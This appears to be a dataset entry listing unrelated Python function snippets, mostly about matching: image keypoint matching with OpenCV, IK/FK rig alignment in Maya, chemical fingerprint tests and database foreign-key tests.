ik_main_rot_plugs = get_rot_plugs(node.ik_main_conn)\n ik_pole_trans_plugs = get_trans_plugs(node.ik_pole_conn)\n\n # Set the new values\n for i, plug in enumerate(ik_main_trans_plugs):\n plug.setFloat(world_trans_fk_03[i])\n\n for i, plug in enumerate(ik_main_rot_plugs):\n plug.setMAngle(oMa.MAngle(world_rot_fk_03[i], oMa.MAngle.kRadians))\n\n for i, plug in enumerate(ik_pole_trans_plugs):\n plug.setFloat(pos_ik_pole[i])", "def MatchRelationshipConfrontation(C):\n for c in C:\n if c.relationships is None:\n continue\n for i, longname in enumerate(c.relationships):\n found = False\n for cor in C:\n if longname.lower() == cor.longname.lower():\n c.relationships[i] = cor\n found = True\n return C", "def find_matching_points(img1, img2, max_pix_movement=50, normalize=True, show=False):\n\n # Initiate ORB detector\n orb = cv2.ORB_create()\n\n # find the keypoints and descriptors with ORB\n kp1, des1 = orb.detectAndCompute(img1, None)\n kp2, des2 = orb.detectAndCompute(img2, None)\n\n # create BFMatcher object\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # Match descriptors.\n matches = bf.match(des1,des2)\n # Sort them in the order of their distance.\n matches = sorted(matches, key = lambda x:x.distance)\n # Draw first 10 matches.\n if show:\n img3 = cv2.drawMatches(img1,kp1,img2,kp2,matches[:500], None,flags=2)\n plt.imshow(img3),plt.show()\n # Get the matching keypoints for each of the images\n\n list_kp1 = []\n list_kp2 = []\n for mat in matches:\n img1_idx = mat.queryIdx\n img2_idx = mat.trainIdx\n\n # x - columns\n # y - rows\n list_kp1.append(kp1[img1_idx].pt)\n list_kp2.append(kp2[img2_idx].pt)\n\n n_kp1, n_kp2 = np.float32(list_kp1), np.float32(list_kp2)\n n_kp1 /= np.asarray([img1.shape[1], img1.shape[0]], np.float32)\n n_kp2 /= np.asarray([img2.shape[1], img2.shape[0]], np.float32)\n n_kp1 = n_kp1 * 2. - 1.\n n_kp2 = n_kp2 * 2. - 1.\n\n return np.int32(list_kp1), np.int32(list_kp2), n_kp1, n_kp2", "def nn_match(descs1, descs2):\n # diff = descs1[:, None, :] - descs2[None, :, :]\n # diff = np.linalg.norm(diff, ord=2, axis=2)\n # indices = np.argmin(diff, axis=1)\n\n flann = cv2.FlannBasedMatcher_create()\n matches = flann.match(descs1.astype(np.float32), descs2.astype(np.float32))\n indices = [x.trainIdx for x in matches]\n\n return indices", "def check_keys(self):", "def match(image1,image2,threshold,useRansac=False,t_orientation=30,t_scale=0.5):\r\n im1, keypoints1, descriptors1 = ReadKeys(image1)\r\n im2, keypoints2, descriptors2 = ReadKeys(image2)\r\n #\r\n # REPLACE THIS CODE WITH YOUR SOLUTION (ASSIGNMENT 5, QUESTION 3)\r\n #\r\n # Generate five random matches (for testing purposes)\r\n # matched_pairs = []\r\n # num = 5\r\n # for i in range(num):\r\n # matched_pairs.append([keypoints1[i],keypoints2[i]])\r\n # return DisplayMatches(im1, im2, matched_pairs)\r\n\r\n # END OF SECTION OF CODE TO REPLACE\r\n #\r\n\r\n #q3\r\n matched_pairs = []\r\n between_angles = np.arccos(np.dot(descriptors1, np.transpose(descriptors2)))\r\n for i, row in enumerate(between_angles):\r\n \tratio = sorted(row)[0] / sorted(row)[1]\r\n \tif ratio <= threshold:\r\n\t \tmatched_pairs.append([keypoints1[i], keypoints2[np.where(row == sorted(row)[0])[0][0]]])\r\n # print(matched_pairs)\r\n if useRansac is False:\r\n return DisplayMatches(im1, im2, matched_pairs)\r\n\t# \r\n\r\n #q4\r\n repetition = 10\r\n subsets = [[]] * repetition\r\n for i in range(repetition):\r\n r = random.randint(0, len(matched_pairs))\r\n for match in matched_pairs:\r\n ds1, ds2 = matched_pairs[r][1][2]/matched_pairs[r][0][2], match[1][2]/match[0][2]\r\n do1, do2 = (matched_pairs[r][1][3]-matched_pairs[r][0][3]), (match[1][3]-match[0][3])\r\n if abs(ds2 - ds1) <= t_scale * ds1 and abs(do2 - do1) % (2 * math.pi) <= t_orientation:\r\n subsets[i].append(match)\r\n\r\n max_i, max_len = 0, subsets[0]\r\n for i in range(10):\r\n l = len(subsets[i])\r\n if l > max_len:\r\n max_len = l\r\n max_i = i\r\n\r\n im3 = DisplayMatches(im1, im2, subsets[max_i])\r\n return im3", "def match(self, other):\n matches = match_descriptors(self.base_view.descriptors, other.descriptors,\n cross_check=True)\n matches = pd.Series({m[0]: m[1] for m in matches}).reindex(\n self._match_table.index)\n self._match_table[other.position.id] = matches", "def compute_matches(self):\n\t\tself.local_database[\"figure_number\"] = [0] * len(self.local_database[\"feature_vectors\"])\n\t\tForensics = wbForensicsHOG(Database=self.local_database)\n\t\tForensics.KDTree_pairs(leaf_size = len(self.local_database)+1)\n\t\tForensics.d_rank(pairs=Forensics.pairs, distances=Forensics.dists, ratios=Forensics.ratios)\n\n\t\tself.local_matches = Forensics.Dist_Rank", "def IK_geometric(dh_params, pose):\n pass", "def _digest_fkeys(self):\n for schema in self.schemas.values():\n for fkey in schema._fkeys.values():\n ref_col = fkey._fkey_doc.get('referenced_columns', [{}])[0]\n pk_sname, pk_tname = ref_col.get('schema_name'), ref_col.get('table_name')\n if pk_sname in self.schemas and pk_tname in self.schemas[pk_sname].tables:\n fkey.pk_table = self.schemas[pk_sname].tables[pk_tname]\n else:\n fkey.pk_table = self._unknown_table", "def test4(self):\n tgts = [ ('CCC(O)C(=O)O',\n ('CCC','OCC','OCC=O','OCCO','CCCC','OC=O','CC(O)C')),\n ]\n for smi,matches in tgts:\n m = Chem.MolFromSmiles(smi)\n fp1 = Chem.RDKFingerprint(m,2,7,9192,4,0)\n obs = fp1.GetOnBits()\n for match in matches:\n m2 = Chem.MolFromSmiles(match)\n fp2 = Chem.RDKFingerprint(m2,2,7,9192,4,0)\n v1,v2 = DataStructs.OnBitProjSimilarity(fp2,fp1)\n assert feq(v1,1.0000),'substruct %s not properly contained in %s'%(match,smi)", "def associated_coroot(self):", "def matchById(firstcat, othercat, otherid='SeqNr', selfid='SeqNr'):\n order = {}\n for i, x in enumerate(firstcat[selfid]):\n order[x] = i\n\n keeporder = []\n for x in othercat[otherid]:\n if x in order:\n keeporder.append(order[x])\n\n keep = np.array(keeporder)\n matched = firstcat[keep]\n print \"INFO: %i matched galaxies kept\" % len(matched)\n return matched", "def match(self, item):", "def _ik_and_fk_aligned(ik_ctrl, tcp_handle):\n\n # Define some small number to threshold our output\n delta = .0001\n\n # Initialize variables\n # translation_is_aligned = False\n # rotation_is_aligned = False\n ik_fk_are_aligned = False\n\n # Find the translation of each object and compare them\n ik_trans = pm.xform(ik_ctrl, q=True, rp=True, ws=True)\n tcp_trans = pm.xform(tcp_handle, q=True, rp=True, ws=True)\n\n # Find the distance between the ik controller and the tcp handle\n trans_diff = math.sqrt((ik_trans[0] - tcp_trans[0]) ** 2\n + (ik_trans[1] - tcp_trans[1]) ** 2\n + (ik_trans[2] - tcp_trans[2]) ** 2)\n\n if round(trans_diff, 6) < delta:\n ik_fk_are_aligned = True\n\n return ik_fk_are_aligned", "def matchModelPose(self):\n\n pass", "def _add_matches(self):\r\n for record in self.records:\r\n match_dict={key_to_track: record.get(key_to_track)\r\n for key_to_track in self.key_matcher.keys()}\r\n self.key_matcher.add(obj=record,\r\n match_dict=match_dict)", "def matches(self, target):\n raise NotImplementedError()", "def MatchMatrixs (self,Node1,Node2):\n\n T1Native_Node = Node1\n T1Native_Matrix = slicer.util.arrayFromVolume(T1Native_Node)\n DimN = T1Native_Matrix.shape\n T1Enhanced_Node = Node2\n T1Enhanced_Matrix = slicer.util.arrayFromVolume(T1Enhanced_Node)\n DimE = T1Enhanced_Matrix.shape\n\n NMatrix = self.GetIJKToRASnpArray(T1Native_Node)\n NVector = NMatrix[:-1,-1]\n EMatrix = self.GetIJKToRASnpArray(T1Enhanced_Node)\n EVector = EMatrix[:-1,-1]\n NPixelSize = [np.linalg.norm(NMatrix[:-1,0]), np.linalg.norm(NMatrix[:-1,1])]\n EPixelSize = [np.linalg.norm(EMatrix[:-1,0]), np.linalg.norm(EMatrix[:-1,1])]\n\n Niversor = NMatrix[:-1,0]/NPixelSize[0]\n Njversor = NMatrix[:-1,1]/NPixelSize[1]\n Nkversor = np.round(np.cross(Niversor,Njversor),3)\n Nkstep = round(np.linalg.norm(NMatrix[:-1,2]),3)\n\n Eiversor = EMatrix[:-1,0]/EPixelSize[0]\n Ejversor = EMatrix[:-1,1]/EPixelSize[1]\n Ekversor = np.round(np.cross(Eiversor,Ejversor),3)\n Ekstep = round(np.linalg.norm(EMatrix[:-1,2]),3)\n print(Nkversor,Ekversor,Nkstep,Ekstep,NVector,EVector,(NVector-EVector).dot(Ekversor))\n if not ( np.sum(Nkversor==Ekversor) == 3 and Nkstep==Ekstep and ((NVector-EVector).dot(Ekversor)) == 0 ): # it verifies if the slices are oriented in the same direction, with the same step between slices and if the first images are complanar.\n slicer.util.warningDisplay('The geometry of the LL Native and LL Enhanced volume doesn\\'t match. It could deteriorate the ECV map', windowTitle= 'Warning')\n\n if (DimE == DimN):\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.NativeT1_Selector.currentNode()) \n return [T1Native_Matrix,T1Enhanced_Matrix]\n if (DimE[1:3] == DimN[1:3]):\n k = min([DimE[1],DimN[1]])\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.NativeT1_Selector.currentNode())\n return [T1Native_Matrix[:k,:,:],T1Enhanced_Matrix[:k,:,:]]\n\n jN = np.arange(0,DimN[2]*NPixelSize[1],NPixelSize[1])+NPixelSize[1]/2+(NVector-EVector).dot(Njversor)\n iN = np.arange(0,DimN[1]*NPixelSize[0],NPixelSize[0])+NPixelSize[0]/2+(NVector-EVector).dot(Niversor)\n iE = np.arange(0,DimE[1]*EPixelSize[0],EPixelSize[0])+EPixelSize[0]/2\n jE = np.arange(0,DimE[2]*EPixelSize[1],EPixelSize[1])+EPixelSize[1]/2 \n if DimE[1] > DimN[1]: ## I concidered a square image\n T1Nreshaped = np.zeros(DimE)\n for k in range(DimN[0]):\n f = interpolate.interp2d(iN, jN, np.nan_to_num(T1Native_Matrix[k,:,:]), fill_value = 0)\n T1Nreshaped[k,:,:] = f(iE, jE)\n T1Ereshaped = T1Enhanced_Matrix[:k+1,:,:]\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.EnhancedT1_Selector.currentNode())\n return [T1Nreshaped,T1Ereshaped]\n else:\n T1Ereshaped = np.zeros(DimN)\n for k in range(DimE[0]):\n f = interpolate.interp2d(iE, jE, np.nan_to_num(T1Enhanced_Matrix[k,:,:]), fill_value = 0)\n T1Ereshaped[k,:,:] = f(iN, jN) \n T1Nreshaped = T1Native_Matrix[:k+1,:,:]\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.NativeT1_Selector.currentNode()) \n return [T1Nreshaped,T1Ereshaped]", "def matches(self, accession):\n pass", "def vsone_feature_matching(kpts1, vecs1, kpts2, vecs2, dlen_sqrd2, cfgdict={},\n flann1=None, flann2=None, verbose=None):\n import vtool as vt\n import pyflann\n from vtool import spatial_verification as sver\n #import vtool as vt\n sver_xy_thresh = cfgdict.get('sver_xy_thresh', .01)\n ratio_thresh = cfgdict.get('ratio_thresh', .625)\n refine_method = cfgdict.get('refine_method', 'homog')\n symmetric = cfgdict.get('symmetric', False)\n K = cfgdict.get('K', 1)\n Knorm = cfgdict.get('Knorm', 1)\n #ratio_thresh = .99\n # GET NEAREST NEIGHBORS\n checks = 800\n #pseudo_max_dist_sqrd = (np.sqrt(2) * 512) ** 2\n #pseudo_max_dist_sqrd = 2 * (512 ** 2)\n if verbose is None:\n verbose = True\n\n flann_params = {'algorithm': 'kdtree', 'trees': 8}\n if flann1 is None:\n flann1 = vt.flann_cache(vecs1, flann_params=flann_params, verbose=verbose)\n\n #print('symmetric = %r' % (symmetric,))\n if symmetric:\n if flann2 is None:\n flann2 = vt.flann_cache(vecs2, flann_params=flann_params, verbose=verbose)\n\n try:\n try:\n num_neighbors = K + Knorm\n fx2_to_fx1, fx2_to_dist = normalized_nearest_neighbors(flann1, vecs2, num_neighbors, checks)\n #fx2_to_fx1, _fx2_to_dist = flann1.nn_index(vecs2, num_neighbors=K, checks=checks)\n if symmetric:\n fx1_to_fx2, fx1_to_dist = normalized_nearest_neighbors(flann2, vecs1, K, checks)\n\n except pyflann.FLANNException:\n print('vecs1.shape = %r' % (vecs1.shape,))\n print('vecs2.shape = %r' % (vecs2.shape,))\n print('vecs1.dtype = %r' % (vecs1.dtype,))\n print('vecs2.dtype = %r' % (vecs2.dtype,))\n raise\n if symmetric:\n is_symmetric = flag_symmetric_matches(fx2_to_fx1, fx1_to_fx2)\n fx2_to_fx1 = fx2_to_fx1.compress(is_symmetric, axis=0)\n fx2_to_dist = fx2_to_dist.compress(is_symmetric, axis=0)\n\n assigntup = assign_unconstrained_matches(fx2_to_fx1, fx2_to_dist)\n\n fx2_match, fx1_match, fx1_norm, match_dist, norm_dist = assigntup\n fm_ORIG = np.vstack((fx1_match, fx2_match)).T\n fs_ORIG = 1 - np.divide(match_dist, norm_dist)\n # APPLY RATIO TEST\n fm_RAT, fs_RAT, fm_norm_RAT = ratio_test(fx2_match, fx1_match, fx1_norm,\n match_dist, norm_dist,\n ratio_thresh)\n\n # SPATIAL VERIFICATION FILTER\n #with ut.EmbedOnException():\n match_weights = np.ones(len(fm_RAT))\n svtup = sver.spatially_verify_kpts(kpts1, kpts2, fm_RAT, sver_xy_thresh,\n dlen_sqrd2, match_weights=match_weights,\n refine_method=refine_method)\n if svtup is not None:\n (homog_inliers, homog_errors, H_RAT) = svtup[0:3]\n else:\n H_RAT = np.eye(3)\n homog_inliers = []\n fm_RAT_SV = fm_RAT.take(homog_inliers, axis=0)\n fs_RAT_SV = fs_RAT.take(homog_inliers, axis=0)\n fm_norm_RAT_SV = fm_norm_RAT[homog_inliers]\n\n top_percent = .5\n top_idx = ut.take_percentile(fx2_to_dist.T[0].argsort(), top_percent)\n fm_TOP = fm_ORIG.take(top_idx, axis=0)\n fs_TOP = fx2_to_dist.T[0].take(top_idx)\n #match_weights = np.ones(len(fm_TOP))\n #match_weights = (np.exp(fs_TOP) / np.sqrt(np.pi * 2))\n match_weights = 1 - fs_TOP\n #match_weights = np.ones(len(fm_TOP))\n svtup = sver.spatially_verify_kpts(kpts1, kpts2, fm_TOP, sver_xy_thresh,\n dlen_sqrd2, match_weights=match_weights,\n refine_method=refine_method)\n if svtup is not None:\n (homog_inliers, homog_errors, H_TOP) = svtup[0:3]\n np.sqrt(homog_errors[0] / dlen_sqrd2)\n else:\n H_TOP = np.eye(3)\n homog_inliers = []\n fm_TOP_SV = fm_TOP.take(homog_inliers, axis=0)\n fs_TOP_SV = fs_TOP.take(homog_inliers, axis=0)\n\n matches = {\n 'ORIG' : MatchTup2(fm_ORIG, fs_ORIG),\n 'RAT' : MatchTup3(fm_RAT, fs_RAT, fm_norm_RAT),\n 'RAT+SV' : MatchTup3(fm_RAT_SV, fs_RAT_SV, fm_norm_RAT_SV),\n 'TOP' : MatchTup2(fm_TOP, fs_TOP),\n 'TOP+SV' : MatchTup2(fm_TOP_SV, fs_TOP_SV),\n }\n output_metdata = {\n 'H_RAT': H_RAT,\n 'H_TOP': H_TOP,\n }\n\n except MatchingError:\n fm_ERR = np.empty((0, 2), dtype=np.int32)\n fs_ERR = np.empty((0, 1), dtype=np.float32)\n H_ERR = np.eye(3)\n matches = {\n 'ORIG' : MatchTup2(fm_ERR, fs_ERR),\n 'RAT' : MatchTup3(fm_ERR, fs_ERR, fm_ERR),\n 'RAT+SV' : MatchTup3(fm_ERR, fs_ERR, fm_ERR),\n 'TOP' : MatchTup2(fm_ERR, fs_ERR),\n 'TOP+SV' : MatchTup2(fm_ERR, fs_ERR),\n }\n output_metdata = {\n 'H_RAT': H_ERR,\n 'H_TOP': H_ERR,\n }\n\n return matches, output_metdata", "def try1():\n path = '/Users/mayankkejriwal/datasets/eswc2017/disasters/'\n model = Word2Vec.load_word2vec_format(path+'GoogleNews-vectors-negative300.bin', binary=True)\n model.init_sims(replace=True)\n keys = ['charlotte', 'Charlotte', 'yorktown', 'LA']\n for key in keys:\n try:\n # print model.most_similar(positive=['woman', 'king'], negative=['man'])\n j = model[key]\n print 'found...',\n print key\n except KeyError:\n print 'not found...',\n print key\n continue\n print model.similarity('charlotte', 'carolina')\n print model.similarity('LA', 'California')", "def hit(self):", "def test_two_referrers(dumper, db):\n dumper.reader.load_db(\n db.create_sample(\n 5,\n fkeys=[\n (\"table1\", \"t2id\", \"table2\", \"id\"),\n (\"table1\", \"t3id\", \"table3\", \"id\"),\n (\"table2\", \"t24id\", \"table4\", \"id\"),\n (\"table3\", \"t34id\", \"table4\", \"id\"),\n ],\n )\n )\n dumper.add_config({\"db_objects\": [{\"name\": \"table1\"}]})\n dumper.perform_dump()\n objs = [obj for obj, match in dumper.writer.dumped if isinstance(obj, Table)]\n assert len(objs) == 4\n\n (match,) = [match for obj, match in dumper.writer.dumped if obj.name == \"table4\"]\n assert len(match.referenced_by) == 2\n assert sorted(fkey.name for fkey in match.referenced_by) == [\n \"t24id_table4_id_fkey\",\n \"t34id_table4_id_fkey\",\n ]", "def test_fkey_nav_rec(dumper, db):\n dumper.reader.load_db(\n db.create_sample(\n 4,\n fkeys=[\n (\"table1\", \"t2id\", \"table2\", \"id\"),\n (\"table2\", \"t3id\", \"table3\", \"id\"),\n ],\n )\n )\n dumper.add_config({\"db_objects\": [{\"name\": \"table1\"}]})\n dumper.perform_dump()\n objs = [obj for obj, match in dumper.writer.dumped if isinstance(obj, Table)]\n assert len(objs) == 3", "def fit(self):\n\n self.bow_archives_by_paperid = {userid: [self.dictionary.doc2bow(doc) for doc in archive] \\\n for userid, archive in self.kp_archives_by_paperid.items()}\n\n self.bow_archives_by_userid = {userid: [self.dictionary.doc2bow(doc) for doc in archive] \\\n for userid, archive in self.kp_archives_by_userid.items()}\n\n flattened_archives = [\n bow for archive in self.bow_archives_by_paperid.values() for bow in archive]\n\n self.index = SparseMatrixSimilarity(\n [self.tfidf[bow] for bow in flattened_archives],\n num_features=len(self.dictionary)\n )", "def test_desy_keyword_translation(self):\n spi_search = \"find dk \\\"B --> pi pi\\\"\"\n inv_search = \"695__a:\\\"B --> pi pi\\\"\"\n self._compare_searches(inv_search, spi_search)", "def match(desc1,desc2):\n desc1 = array([d/linalg.norm(d) for d in desc1])\n desc2 = array([d/linalg.norm(d) for d in desc2])\n dist_ratio = 0.6\n desc1_size = desc1.shape\n matchscores = zeros((desc1_size[0],1),'int')\n desc2t = desc2.T # precompute matrix transpose\n for i in range(desc1_size[0]):\n dotprods = dot(desc1[i, :], desc2t) # vector of dot products\n dotprods *= 0.9999\n # inverse cosine and sort, return index for features in second image\n indx = argsort(arccos(dotprods))\n # check if nearest neighbor has angle less than dist_ratio times 2nd\n if arccos(dotprods)[indx[0]] < dist_ratio * arccos(dotprods)[indx[1]]:\n matchscores[i] = int(indx[0])\n return matchscores", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def match(desc1,desc2):\n\t\n\tdesc1 = array([d/linalg.norm(d) for d in desc1])\n\tdesc2 = array([d/linalg.norm(d) for d in desc2])\n\t\n\tdist_ratio = 0.6\n\tdesc1_size = desc1.shape\n\t\n\tmatchscores = zeros((desc1_size[0],1))\n\tdesc2t = desc2.T #precompute matrix transpose\n\tfor i in range(desc1_size[0]):\n\t\tdotprods = dot(desc1[i,:],desc2t) #vector of dot products\n\t\tdotprods = 0.9999*dotprods\n\t\t#inverse cosine and sort, return index for features in second image\n\t\tindx = argsort(arccos(dotprods))\n\t\t\n\t\t#check if nearest neighbor has angle less than dist_ratio times 2nd\n#\t\tif arccos(dotprods)[indx[0]] < dist_ratio * arccos(dotprods)[indx[1]]:\n\t\tmatchscores[i] = int(indx[0])\n\t\n\treturn matchscores", "def pg_secondary_keys(self):", "def key_ik(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n if not pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_ik(robot)\n\n ik_attributes = ['ik',\n 'v',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3']\n\n # Key all IK elements\n for attr in ik_attributes:\n pm.setKeyframe(target_ctrl_path, attribute=attr)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n fk_pose = find_fk_config(robot)\n\n # Key all FK elements\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY',\n value=fk_pose[0])\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[1])\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[2])\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[3])\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[4])\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[5])\n\n # Key visibility of FK controllers\n pm.setKeyframe(fk_ctrls_path, attribute='visibility')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')", "def refseq_based_clustering(self):\n self.refseq_based = Usefuls.NonRedSet.NonRedSetDict()\n for prey in self.ivv_info.Prey_info().preys():\n refseqid = self.get_refseq(prey)\n if refseqid:\n self.refseq_based.append_Dict(refseqid, prey)", "def edge_mapping(self):\n ...", "def testFindCorrespondence(self):\n # Create some dummy keypoints and descriptors to match. Make the descriptors really far apart to be sure.\n keypoints1 = []\n descriptors1 = numpy.zeros(shape=(3, 1))\n keypoint = cv2.KeyPoint()\n for i in range(3):\n keypoint.pt = (float(i), 0.0)\n keypoints1.append(keypoint)\n descriptors1[i] = i*100.0\n keypoints2 = []\n descriptors2 = numpy.zeros(shape=(5, 1))\n for i in range(5):\n keypoint.pt = (0.0, float(i))\n keypoints2.append(keypoint)\n descriptors2[i] = i*105.0\n (first_points, second_points) = self.evaluator._findCorrespondence(\n keypoints1, descriptors1, keypoints2, descriptors2)\n expected_first = numpy.array([[0.0, 0.0], [1.0, 0.0], [2.0, 0.0]])\n expected_second = numpy.array([[0.0, 0.0], [0.0, 1.0], [0.0, 2.0]])\n self.assertTrue(numpy.array_equal(first_points, expected_first))\n self.assertTrue(numpy.array_equal(second_points, expected_second))", "def illustrate_matching(self):\n work_dir = self.work_dir\n draw_keys_oriented(work_dir+'matching_keys_im0.txt',\n work_dir+'input_0.orig.png',\n work_dir+'matching_keys_im0.png')\n draw_keys_oriented(work_dir+'matching_keys_im1.txt',\n work_dir+'input_1.orig.png',\n work_dir+'matching_keys_im1.png')\n draw_matches(work_dir+'matches.txt',\n work_dir+'input_0.orig.png',\n work_dir+'input_1.orig.png',\n work_dir+'OUTmatches.png')\n return 1", "def look_for_reference_image(image):\n match_list = []\n thresh = 8\n final_value = -1\n references = import_reference_images()\n # Initialize the ORB detector algorithm\n orb = cv2.ORB_create()\n\n # Now detect the keypoints and compute\n # the descriptors for the query image\n imgKeypoints, imgDescriptors = orb.detectAndCompute(image, None)\n try:\n for ref in references:\n # Now detect the keypoints and compute\n # the descriptors for the train image\n ref.refKeypoints, ref.refDescriptors = orb.detectAndCompute(ref.img, None)\n\n # Initialize the Matcher for matching\n # the keypoints and then match the\n # keypoints\n matcher = cv2.BFMatcher()\n matches = matcher.knnMatch(imgDescriptors, ref.refDescriptors, k=2)\n\n for m, n in matches:\n if m.distance < 0.75 * n.distance:\n ref.refMatches.append([m])\n\n match_list.append(len(ref.refMatches))\n except:\n pass\n if len(match_list) != 0:\n if max(match_list) > thresh:\n final_value = match_list.index(max(match_list))\n\n return references[final_value].name", "def test5(self):\n tgts = [ ('CCC(O)C(=O)O',\n ('O[CH-][CH2-]','O[CH-][C-]=O')),\n ]\n for smi,matches in tgts:\n m = Chem.MolFromSmiles(smi)\n fp1 = Chem.RDKFingerprint(m,2,7,9192,4,1)\n obs = fp1.GetOnBits()\n for match in matches:\n m2 = Chem.MolFromSmiles(match)\n fp2 = Chem.RDKFingerprint(m2,2,7,9192,4,1)\n v1,v2 = DataStructs.OnBitProjSimilarity(fp2,fp1)\n assert feq(v1,1.0000),'substruct %s not properly contained in %s'%(match,smi)", "def test_post_chain_search(self):\n pass", "def object_detection(self):\r\n pass", "def test_normal_fields_can_be_defined_between_primary_keys(self):", "def similarity(self, e1, e2):\n\t\tpass", "def find(image):\n keypoint, description = describe(image)\n # load keypoints, descriptions from mongodb\n\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n best_match_size = float(\"inf\")\n best_match_index = -1\n match_index = 0\n best_matches = 0\n\n for desc in descriptions:\n matches = bf.match(desc,description)\n matches = sorted(matches, key = lambda x:x.distance)\n if len(matches) > 0:\n match_size = sum(x.distance for x in matches[:10])\n\n print \"match size is \", match_size\n if match_size < best_match_size:\n best_match_size = match_size\n best_match_index = match_index\n best_matches = matches\n\n match_index += 1\n\n needle_color = cv2.imread('needle-stripped.png')[:,:,::-1] # needle\n best_match_image = cv2.imread(\"haystack/\"+files[best_match_index])\n print \"best match is \", files[best_match_index]\n\n # Draw first 10 matches.\n outImg = cv2.imread(\"output/outImg.png\")\n match = cv2.drawMatches(needle_color,keypoint,best_match_image[:,:,::-1],keypoints[best_match_index],best_matches[-20:],outImg, flags=6)\n\n plt.imshow(match),plt.show()\n return", "def _fit_exact_match(self):\n entity_map = self._resource_loader.get_entity_map(self.type)\n self._exact_match_mapping = self._process_entity_map(\n self.type, entity_map, self._normalizer\n )", "def matches(self, feature):\n pass", "def fix_annotmatch_pzmaster1():\n import wbia\n\n ibs = wbia.opendb('PZ_Master1')\n infr = wbia.AnnotInference(ibs=ibs, aids=ibs.get_valid_aids(), verbose=5)\n infr.initialize_graph()\n annots = ibs.annots()\n aid_to_nid = ut.dzip(annots.aids, annots.nids)\n\n if False:\n infr.reset_feedback()\n infr.ensure_mst()\n infr.apply_feedback_edges()\n infr.relabel_using_reviews()\n infr.start_qt_interface()\n\n # Get annotmatch rowids that agree with current labeling\n if False:\n annotmatch = ibs.db.get_table_as_pandas('annotmatch')\n import pandas as pd\n\n flags1 = pd.isnull(annotmatch['annotmatch_evidence_decision'])\n flags2 = annotmatch['annotmatch_tag_text'] == ''\n bad_part = annotmatch[flags1 & flags2]\n rowids = bad_part.index.tolist()\n ibs.delete_annotmatch(rowids)\n\n if False:\n # Delete bidirectional annotmatches\n annotmatch = 